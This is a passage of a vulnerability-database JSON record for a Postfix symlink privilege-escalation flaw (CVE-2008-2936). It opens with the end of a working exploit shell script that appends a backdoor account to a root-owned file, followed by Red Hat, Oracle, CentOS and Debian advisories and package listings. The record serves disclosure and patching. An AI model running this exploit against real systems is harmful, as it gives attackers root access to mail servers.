Trying to delete it\"\r\n\r\n if [ -e $spool_dir/$useful_link_dst ] ; then\r\n quit \"[!] Couldn't delete it\"\r\n else\r\n echo \"[*] Deletion ok\"\r\n fi\r\n\r\nfi\r\n\r\naliases=`$postconf alias_database | cut -d\"=\" -f2`\r\n$postconf alias_maps | grep -q $aliases\r\nif [ $? -eq 0 ] ; then\r\n if [ $aliases ] ; then\r\n $postmap -q $user $aliases > /dev/null\r\n if [ $? -eq 0 ] ; then\r\n quit \"[!] Mail alias for \\\"$user\\\" exists\"\r\n fi\r\n fi\r\nfi\r\n\r\nlda=`$postconf mailbox_command | cut -d\"=\" -f2`\r\nif [ $lda ] ; then\r\n quit \"[!] Non-Postfix LDA detected\"\r\nfi \r\n\r\n$postconf home_mailbox | grep -q '/$'\r\nif [ $? -eq 0 ] ; then\r\n quit \"[!] Maildir-style mailbox detected\"\r\nfi\r\n\r\n\r\n# Step 2: Exploiting\r\n\r\nln -f $useful_link $spool_dir/$user 2> /dev/null || quit \"[!] Couldn't create hardlink (different partitions?)\"\r\nln -s -f $target $spool_dir/$useful_link_dst 2> /dev/null || quit \"[!] Couldn't create symlink pointing to target file\"\r\ncp -f $target $writable_dir/pocfix_target_backup.$$ && echo \"[*] Backed up: $target (saved as \\\"$writable_dir/pocfix_target_backup.$$\\\")\"\r\necho \"[*] Sending mail ($seconds seconds wait)\"\r\necho $user_in_passwd | /usr/sbin/sendmail $user\r\n\r\nsleep $seconds\r\n\r\ndiff -q $target $writable_dir/pocfix_target_backup.$$ > /dev/null\r\n\r\nif [ $? -eq 0 ] ; then\r\n echo \"[!] Exploit failed\"\r\nelse\r\n echo \"[*] Exploit successful (appended data to $target). 
Now \\\"su dsr\\\", pass is \\\"dsrrocks\\\")\"\r\nfi\r\n\r\nrm -f $spool_dir/$user\r\nrm -f $spool_dir/$useful_link_dst\r\n\r\n# milw0rm.com [2008-08-31]\r\n", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/6337/"}], "redhat": [{"lastseen": "2019-08-13T18:46:30", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2936"], "description": "Postfix is a Mail Transport Agent (MTA), supporting LDAP, SMTP AUTH (SASL),\nand TLS.\n\nA flaw was found in the way Postfix dereferences symbolic links. If a local\nuser has write access to a mail spool directory with no root mailbox, it\nmay be possible for them to append arbitrary data to files that root has\nwrite permission to. (CVE-2008-2936)\n\nRed Hat would like to thank Sebastian Krahmer for responsibly disclosing\nthis issue.\n\nAll users of postfix should upgrade to these updated packages, which\ncontain a backported patch that resolves this issue.", "modified": "2017-09-08T12:11:11", "published": "2008-08-14T04:00:00", "id": "RHSA-2008:0839", "href": "https://access.redhat.com/errata/RHSA-2008:0839", "type": "redhat", "title": "(RHSA-2008:0839) Moderate: postfix security update", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:46", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2936"], "description": "[2.3.3-2.1]\n- fixed postfix privilege problem with symlinks in the mail spool directory\n (CVE-2008-2936)\n Resolves: rhbz#456717", "edition": 4, "modified": "2008-08-14T00:00:00", "published": "2008-08-14T00:00:00", "id": "ELSA-2008-0839", "href": "http://linux.oracle.com/errata/ELSA-2008-0839.html", "title": "postfix security update", "type": "oraclelinux", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:24:31", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2936"], "description": "**CentOS Errata and 
Security Advisory** CESA-2008:0839\n\n\nPostfix is a Mail Transport Agent (MTA), supporting LDAP, SMTP AUTH (SASL),\nand TLS.\n\nA flaw was found in the way Postfix dereferences symbolic links. If a local\nuser has write access to a mail spool directory with no root mailbox, it\nmay be possible for them to append arbitrary data to files that root has\nwrite permission to. (CVE-2008-2936)\n\nRed Hat would like to thank Sebastian Krahmer for responsibly disclosing\nthis issue.\n\nAll users of postfix should upgrade to these updated packages, which\ncontain a backported patch that resolves this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2008-August/027223.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-August/027224.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-August/027225.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-August/027226.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-August/027235.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-August/027237.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-August/027240.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-August/027243.html\n\n**Affected packages:**\npostfix\npostfix-pflogsumm\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2008-0839.html", "edition": 4, "modified": "2008-08-23T15:42:47", "published": "2008-08-15T09:43:49", "href": "http://lists.centos.org/pipermail/centos-announce/2008-August/027223.html", "id": "CESA-2008:0839", "title": "postfix security update", "type": "centos", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2020-11-11T13:21:51", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2936"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1629-2 security@debian.org\nhttp://www.debian.org/security/ Thijs 
Kinkhorst\nAugust 19, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : postfix\nVulnerability : programming error\nProblem type : local\nDebian-specific: no\nCVE Id(s) : CVE-2008-2936\n\nDue to a version numbering problem, the Postfix update for DSA 1629 was\nnot installable on the i386 (Intel ia32) architecture. This update\nincreases the version number to make it installable on i386 aswell.\nFor reference the original advisory text is below.\n\nSebastian Krahmer discovered that Postfix, a mail transfer agent,\nincorrectly checks the ownership of a mailbox. In some configurations,\nthis allows for appending data to arbitrary files as root.\n\nNote that only specific configurations are vulnerable; the default\nDebian installation is not affected. Only a configuration meeting\nthe following requirements is vulnerable:\n * The mail delivery style is mailbox, with the Postfix built-in\n local(8) or virtual(8) delivery agents.\n * The mail spool directory (/var/spool/mail) is user-writeable.\n * The user can create hardlinks pointing to root-owned symlinks\n located in other directories.\n\nFor a detailed treating of the issue, please refer to the upstream\nauthor's announcement:\nhttp://article.gmane.org/gmane.mail.postfix.announce/110\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 2.3.8-2+etch1.\n\nFor the testing distribution (lenny), this problem has been fixed in\nversion 2.5.2-2lenny1.\n\nFor the unstable distribution (sid), this problem has been fixed\nin version 2.5.4-1.\n\nWe recommend that you upgrade your postfix package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install 
corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2+etch1.diff.gz\n Size/MD5 checksum: 187783 06817c1a9ac78db520c4a9856e1f606f\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8.orig.tar.gz\n Size/MD5 checksum: 2787761 a6c560657788fc7a5444fa9ea32f5513\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2+etch1.dsc\n Size/MD5 checksum: 1201 67cfbe6d62f54b03248610decf23430c\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/p/postfix/postfix-doc_2.3.8-2+etch1_all.deb\n Size/MD5 checksum: 784924 be2dfaabc9e4346fb211be9383c6b7b0\n http://security.debian.org/pool/updates/main/p/postfix/postfix-dev_2.3.8-2+etch1_all.deb\n Size/MD5 checksum: 130964 ee83b6a25f458aa3fe785202db29763c\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pcre_2.3.8-2+etch1_amd64.deb\n Size/MD5 checksum: 38398 7a1047488b79e2e02f624d11014eeecf\n http://security.debian.org/pool/updates/main/p/postfix/postfix-mysql_2.3.8-2+etch1_amd64.deb\n Size/MD5 checksum: 38426 a016eeaf7033d0ac5eb07b999f2e6af7\n http://security.debian.org/pool/updates/main/p/postfix/postfix-cdb_2.3.8-2+etch1_amd64.deb\n Size/MD5 checksum: 36466 e0e5537af489daac95e2d74fdee07a6e\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2+etch1_amd64.deb\n Size/MD5 checksum: 1148900 f631d16e8027a78c47ac6ab2c6503e56\n http://security.debian.org/pool/updates/main/p/postfix/postfix-ldap_2.3.8-2+etch1_amd64.deb\n Size/MD5 checksum: 43348 1daae02f16464e366f2386e4b82de1d9\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pgsql_2.3.8-2+etch1_amd64.deb\n Size/MD5 checksum: 38532 63a6da1adb632be43c7118e48ef6f5a6\n\nhppa architecture (HP PA 
RISC)\n\n http://security.debian.org/pool/updates/main/p/postfix/postfix-ldap_2.3.8-2+etch1_hppa.deb\n Size/MD5 checksum: 45392 6d5ac13f7d0cd38c4568f5dce3b2de18\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pcre_2.3.8-2+etch1_hppa.deb\n Size/MD5 checksum: 39720 89ed20f277270f74b7b6f7e92bb5b2b1\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pgsql_2.3.8-2+etch1_hppa.deb\n Size/MD5 checksum: 40194 8635fee29c0e8b661ea8cbd3bf6093e9\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2+etch1_hppa.deb\n Size/MD5 checksum: 1174188 fee76ba8167cdffacd22445eca7396b2\n http://security.debian.org/pool/updates/main/p/postfix/postfix-cdb_2.3.8-2+etch1_hppa.deb\n Size/MD5 checksum: 37600 c3cddbeefe87b66277dccd6e2bd52f64\n http://security.debian.org/pool/updates/main/p/postfix/postfix-mysql_2.3.8-2+etch1_hppa.deb\n Size/MD5 checksum: 39922 572e0d5c09d39a34373d8340c2326b2b\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2+etch1_i386.deb\n Size/MD5 checksum: 1090008 e38c0784774c29bb313b8b7d77719782\n http://security.debian.org/pool/updates/main/p/postfix/postfix-cdb_2.3.8-2+etch1_i386.deb\n Size/MD5 checksum: 36596 88af7c1ebb9d6ef8ff1ae1fe82892ca5\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pcre_2.3.8-2+etch1_i386.deb\n Size/MD5 checksum: 38456 3fd5eb9b366ff22b4a8c46b621a216df\n http://security.debian.org/pool/updates/main/p/postfix/postfix-mysql_2.3.8-2+etch1_i386.deb\n Size/MD5 checksum: 38772 049c34f8a10e283505978c6be7255a7b\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pgsql_2.3.8-2+etch1_i386.deb\n Size/MD5 checksum: 38864 440cb71e2a26168a938896ff2af1adc2\n http://security.debian.org/pool/updates/main/p/postfix/postfix-ldap_2.3.8-2+etch1_i386.deb\n Size/MD5 checksum: 43250 f5432050f81caf7e58f52cb48c22e7e1\n\nia64 architecture (Intel ia64)\n\n 
http://security.debian.org/pool/updates/main/p/postfix/postfix-ldap_2.3.8-2+etch1_ia64.deb\n Size/MD5 checksum: 47956 915c2fab14248e142187e5a613f274c9\n http://security.debian.org/pool/updates/main/p/postfix/postfix-cdb_2.3.8-2+etch1_ia64.deb\n Size/MD5 checksum: 38050 4b9c7bda45177283e157153d43633e43\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pcre_2.3.8-2+etch1_ia64.deb\n Size/MD5 checksum: 40858 0cdb4f975d9a630f8df58c9cf124fbd1\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pgsql_2.3.8-2+etch1_ia64.deb\n Size/MD5 checksum: 41164 f0a564de59c461d0e0b667848a18a3f5\n http://security.debian.org/pool/updates/main/p/postfix/postfix-mysql_2.3.8-2+etch1_ia64.deb\n Size/MD5 checksum: 40856 3e9ad3317bf31270eaa686f84f7fb8bb\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2+etch1_ia64.deb\n Size/MD5 checksum: 1439632 c341d7a699bbe6b13dc560e6f5b4cbbd\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/p/postfix/postfix-ldap_2.3.8-2+etch1_powerpc.deb\n Size/MD5 checksum: 44290 4c9c2a9c614643bfe983d13b6423d423\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pgsql_2.3.8-2+etch1_powerpc.deb\n Size/MD5 checksum: 40060 4804a7f44b861b6dbeb1a7294709c5ed\n http://security.debian.org/pool/updates/main/p/postfix/postfix-cdb_2.3.8-2+etch1_powerpc.deb\n Size/MD5 checksum: 37822 11ba1ae93492801dc9de16b6130288d1\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2+etch1_powerpc.deb\n Size/MD5 checksum: 1167796 7a24c4ea8588e62178a5d2a1c4817f85\n http://security.debian.org/pool/updates/main/p/postfix/postfix-mysql_2.3.8-2+etch1_powerpc.deb\n Size/MD5 checksum: 39902 363e664c54605ee838c6cf0c8fd9f790\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pcre_2.3.8-2+etch1_powerpc.deb\n Size/MD5 checksum: 39758 a33b97afba4cfe193884cdf4a3543e03\n\ns390 architecture (IBM S/390)\n\n 
http://security.debian.org/pool/updates/main/p/postfix/postfix-ldap_2.3.8-2+etch1_s390.deb\n Size/MD5 checksum: 43392 1318549e29ce2585850562abb98b07f7\n http://security.debian.org/pool/updates/main/p/postfix/postfix-mysql_2.3.8-2+etch1_s390.deb\n Size/MD5 checksum: 38836 a76263d1e6715aa1294307bf581b6424\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pcre_2.3.8-2+etch1_s390.deb\n Size/MD5 checksum: 38454 00b3e98eb57590201dfe4d8775ce298b\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pgsql_2.3.8-2+etch1_s390.deb\n Size/MD5 checksum: 39010 2d3a02a0e7c7a8ddbe9d0619fe4f8c7d\n http://security.debian.org/pool/updates/main/p/postfix/postfix-cdb_2.3.8-2+etch1_s390.deb\n Size/MD5 checksum: 36654 82b473e570eff711781cc384e86636e2\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2+etch1_s390.deb\n Size/MD5 checksum: 1154442 64bf33d9dc4f14badb1c6397a74713f4\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 7, "modified": "2008-08-19T09:02:20", "published": "2008-08-19T09:02:20", "id": "DEBIAN:DSA-1629-2:3AB83", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00215.html", "title": "[SECURITY] [DSA 1629-2] New postfix packages fix installability problem on i386", "type": "debian", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-11T13:29:09", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2936"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1629-1 
security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nAugust 18, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : postfix\nVulnerability : programming error\nProblem type : local\nDebian-specific: no\nCVE Id(s) : CVE-2008-2936\n\nSebastian Krahmer discovered that Postfix, a mail transfer agent,\nincorrectly checks the ownership of a mailbox. In some configurations,\nthis allows for appending data to arbitrary files as root.\n\nThe default Debian installation of Postfix is not affected. Only a\nconfiguration meeting the following requirements is vulnerable:\n * The mail delivery style is mailbox, with the Postfix built-in\n local(8) or virtual(8) delivery agents.\n * The mail spool directory is user-writeable.\n * The user can create hardlinks pointing to root-owned symlinks\n located in other directories.\n\nFor a detailed treating of this issue, please refer to the upstream\nauthor's announcement:\nhttp://article.gmane.org/gmane.mail.postfix.announce/110\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 2.3.8-2etch1.\n\nFor the testing distribution (lenny), this problem has been fixed in\nversion 2.5.2-2lenny1.\n\nFor the unstable distribution (sid), this problem has been fixed\nin version 2.5.4-1.\n\nWe recommend that you upgrade your postfix package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource archives:\n\n 
http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8.orig.tar.gz\n Size/MD5 checksum: 2787761 a6c560657788fc7a5444fa9ea32f5513\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2etch1.diff.gz\n Size/MD5 checksum: 177462 0827e61a7033e8625d92123c84b32782\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2etch1.dsc\n Size/MD5 checksum: 907 8e9f0c462c57eb2be521714404474aca\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/p/postfix/postfix-dev_2.3.8-2etch1_all.deb\n Size/MD5 checksum: 130818 5038e376db1c661eb0284f96dff4761a\n http://security.debian.org/pool/updates/main/p/postfix/postfix-doc_2.3.8-2etch1_all.deb\n Size/MD5 checksum: 785408 5db9bdc0300637afd3d508afe2c261dc\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2etch1_alpha.deb\n Size/MD5 checksum: 1188364 c8c7f45763ccfd74b84335ea073c551c\n http://security.debian.org/pool/updates/main/p/postfix/postfix-cdb_2.3.8-2etch1_alpha.deb\n Size/MD5 checksum: 36556 fcb1c6262baed1402032c2105b83d059\n http://security.debian.org/pool/updates/main/p/postfix/postfix-mysql_2.3.8-2etch1_alpha.deb\n Size/MD5 checksum: 38746 a0d1334395beda433d586b63b0d60b80\n http://security.debian.org/pool/updates/main/p/postfix/postfix-ldap_2.3.8-2etch1_alpha.deb\n Size/MD5 checksum: 43408 d9e830efc4532ccddc46f394232959a6\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pcre_2.3.8-2etch1_alpha.deb\n Size/MD5 checksum: 38596 855c8573280d5b191a12175b2e7afe8c\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pgsql_2.3.8-2etch1_alpha.deb\n Size/MD5 checksum: 38928 579217f55db12977c61b8d437f3ab436\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pcre_2.3.8-2etch1_amd64.deb\n Size/MD5 checksum: 38318 24205dd0481bb1d78684167d8d20f44f\n 
http://security.debian.org/pool/updates/main/p/postfix/postfix-mysql_2.3.8-2etch1_amd64.deb\n Size/MD5 checksum: 38338 50a46f34f638ea42525b98ca985b4f11\n http://security.debian.org/pool/updates/main/p/postfix/postfix-ldap_2.3.8-2etch1_amd64.deb\n Size/MD5 checksum: 43268 a24dd35f2ec288c2c4f674099e44385f\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2etch1_amd64.deb\n Size/MD5 checksum: 1148848 f27f053dffd95b730f1186ed37ed8673\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pgsql_2.3.8-2etch1_amd64.deb\n Size/MD5 checksum: 38460 907b2a8d84a54cdf31ade8c201d3780a\n http://security.debian.org/pool/updates/main/p/postfix/postfix-cdb_2.3.8-2etch1_amd64.deb\n Size/MD5 checksum: 36378 1ab120583bcc5873a5350d9786282eab\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/p/postfix/postfix-ldap_2.3.8-2etch1_arm.deb\n Size/MD5 checksum: 42742 2d6799c7726a3943a39939baebacdc98\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pcre_2.3.8-2etch1_arm.deb\n Size/MD5 checksum: 38324 6acd31d6ce0200fdd49043c99459c4c8\n http://security.debian.org/pool/updates/main/p/postfix/postfix-mysql_2.3.8-2etch1_arm.deb\n Size/MD5 checksum: 38394 52628e6399391671a8512ed25739813c\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pgsql_2.3.8-2etch1_arm.deb\n Size/MD5 checksum: 38592 1db4a21bb2c6f135e342b65317ecb897\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2etch1_arm.deb\n Size/MD5 checksum: 1080626 3e05804bf0bf7101ae3e4eec33d1524f\n http://security.debian.org/pool/updates/main/p/postfix/postfix-cdb_2.3.8-2etch1_arm.deb\n Size/MD5 checksum: 36378 71361b9cd3c008a9e96e8c23866b1a80\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/p/postfix/postfix-cdb_2.3.8-2etch1_hppa.deb\n Size/MD5 checksum: 37504 76b3b4785a5e91fc1010ce32ccee31ed\n http://security.debian.org/pool/updates/main/p/postfix/postfix-ldap_2.3.8-2etch1_hppa.deb\n Size/MD5 checksum: 45296 
73bc72e54d6ef6909fd3df4266061d7b\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pgsql_2.3.8-2etch1_hppa.deb\n Size/MD5 checksum: 40138 807908ccb69444d9aa1917861dc51af9\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2etch1_hppa.deb\n Size/MD5 checksum: 1174040 44260c5be83cd1d051de22c155aee72a\n http://security.debian.org/pool/updates/main/p/postfix/postfix-mysql_2.3.8-2etch1_hppa.deb\n Size/MD5 checksum: 39814 547026b4994dfbf216be7f9ee0487054\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pcre_2.3.8-2etch1_hppa.deb\n Size/MD5 checksum: 39624 69209a3695bb1568f8c11e6ab4bb792d\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/p/postfix/postfix-cdb_2.3.8-2etch1_i386.deb\n Size/MD5 checksum: 36514 2c10b797c15b02828b344693d4f9c597\n http://security.debian.org/pool/updates/main/p/postfix/postfix-mysql_2.3.8-2etch1_i386.deb\n Size/MD5 checksum: 38680 d1beb196bcc090457a791760b5e7bdfd\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pcre_2.3.8-2etch1_i386.deb\n Size/MD5 checksum: 38354 d074798f79b42bd245e13b8ce0f3adef\n http://security.debian.org/pool/updates/main/p/postfix/postfix-ldap_2.3.8-2etch1_i386.deb\n Size/MD5 checksum: 43160 40cc3fc2fc6374a07893321c2758a447\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pgsql_2.3.8-2etch1_i386.deb\n Size/MD5 checksum: 38770 d97f22246f4cb6cb48e4c993ad37daac\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2etch1_i386.deb\n Size/MD5 checksum: 1092656 30352104ad6fad91f13b996483e52e5b\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/p/postfix/postfix-cdb_2.3.8-2etch1_ia64.deb\n Size/MD5 checksum: 37958 d3628d8f8d4fa6cc760ef77e21acb468\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pcre_2.3.8-2etch1_ia64.deb\n Size/MD5 checksum: 40762 6c5dcb7f2d6196ddf23a8e6d7b9e5f10\n 
http://security.debian.org/pool/updates/main/p/postfix/postfix-ldap_2.3.8-2etch1_ia64.deb\n Size/MD5 checksum: 47878 bb8188e31d1a632164d1bb5dda88a810\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2etch1_ia64.deb\n Size/MD5 checksum: 1439608 cfc2f5db48f0f6bcc8ddb3e85a4032d6\n http://security.debian.org/pool/updates/main/p/postfix/postfix-mysql_2.3.8-2etch1_ia64.deb\n Size/MD5 checksum: 40766 59cd143a5727868aaae30f309286a433\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pgsql_2.3.8-2etch1_ia64.deb\n Size/MD5 checksum: 41066 385bf68a76cd27e12e012bf535a841e0\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/p/postfix/postfix-mysql_2.3.8-2etch1_mips.deb\n Size/MD5 checksum: 38194 014b70898f5aae21a95877c4e32f9941\n http://security.debian.org/pool/updates/main/p/postfix/postfix-cdb_2.3.8-2etch1_mips.deb\n Size/MD5 checksum: 36186 7c957d531808b35bd6994aeea448e213\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pcre_2.3.8-2etch1_mips.deb\n Size/MD5 checksum: 38188 29a16989a6414ed3722f1422f46d9cd2\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pgsql_2.3.8-2etch1_mips.deb\n Size/MD5 checksum: 38446 0dc8cfc6f527161b8b4ce16dd8b297c6\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2etch1_mips.deb\n Size/MD5 checksum: 1129132 4e6a95c1f4040b7b24ac18ab80455d4d\n http://security.debian.org/pool/updates/main/p/postfix/postfix-ldap_2.3.8-2etch1_mips.deb\n Size/MD5 checksum: 42376 af1d25a56c756443db89f6aa6a7bbb38\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/p/postfix/postfix-cdb_2.3.8-2etch1_powerpc.deb\n Size/MD5 checksum: 37738 ee3c0924d5deb0d61741c9497156c0bf\n http://security.debian.org/pool/updates/main/p/postfix/postfix-ldap_2.3.8-2etch1_powerpc.deb\n Size/MD5 checksum: 44218 6ade57e38f9948016b71e6373f6f1863\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pcre_2.3.8-2etch1_powerpc.deb\n 
Size/MD5 checksum: 39670 6a6597cfb2a225d05963a149386d8fcc\n http://security.debian.org/pool/updates/main/p/postfix/postfix-mysql_2.3.8-2etch1_powerpc.deb\n Size/MD5 checksum: 39774 3979adcff1c659588beb2e65c5ddb4d3\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2etch1_powerpc.deb\n Size/MD5 checksum: 1167716 45d3590893a6b4c3efc99780508f92e1\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pgsql_2.3.8-2etch1_powerpc.deb\n Size/MD5 checksum: 39966 7acc51d59c4c640b8c4963c09c573356\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/p/postfix/postfix-mysql_2.3.8-2etch1_s390.deb\n Size/MD5 checksum: 38752 56864ace555741a8e580ac9cdad129c3\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2etch1_s390.deb\n Size/MD5 checksum: 1154368 f62e41e9b4d18eaaf76d0096370ceb1f\n http://security.debian.org/pool/updates/main/p/postfix/postfix-cdb_2.3.8-2etch1_s390.deb\n Size/MD5 checksum: 36562 9deaaf037d9694a5a09f01743c687a52\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pcre_2.3.8-2etch1_s390.deb\n Size/MD5 checksum: 38360 6191ba334c80aa5e4dd12df40781c96d\n http://security.debian.org/pool/updates/main/p/postfix/postfix-ldap_2.3.8-2etch1_s390.deb\n Size/MD5 checksum: 43310 9a73eaee5cfd0b3656976a36c256e676\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pgsql_2.3.8-2etch1_s390.deb\n Size/MD5 checksum: 38918 570c0d157fd6b6b4102122a965d3e6f6\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pgsql_2.3.8-2etch1_sparc.deb\n Size/MD5 checksum: 38198 6ca537558089e41ebbdea7c90f2e4fd4\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pcre_2.3.8-2etch1_sparc.deb\n Size/MD5 checksum: 37906 746615a2cc165a0fcb5aff5be073e289\n http://security.debian.org/pool/updates/main/p/postfix/postfix-mysql_2.3.8-2etch1_sparc.deb\n Size/MD5 checksum: 38058 ac84629509e45bf424752e4852e175e1\n 
http://security.debian.org/pool/updates/main/p/postfix/postfix-cdb_2.3.8-2etch1_sparc.deb\n Size/MD5 checksum: 36106 55d00480a61daa52578d69081a4e93a6\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2etch1_sparc.deb\n Size/MD5 checksum: 1080776 87ff76ea63ba069b769b3491fac51670\n http://security.debian.org/pool/updates/main/p/postfix/postfix-ldap_2.3.8-2etch1_sparc.deb\n Size/MD5 checksum: 42910 767373c92a53b62640e69b16749f1fcc\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 13, "modified": "2008-08-18T20:51:36", "published": "2008-08-18T20:51:36", "id": "DEBIAN:DSA-1629-1:960C3", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00214.html", "title": "[SECURITY] [DSA 1629-1] New postfix packages fix privilege escalation", "type": "debian", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:43", "description": "\nPostfix 2.6-20080814 - symlink Local Privilege Escalation", "edition": 1, "published": "2008-08-31T00:00:00", "title": "Postfix 2.6-20080814 - symlink Local Privilege Escalation", 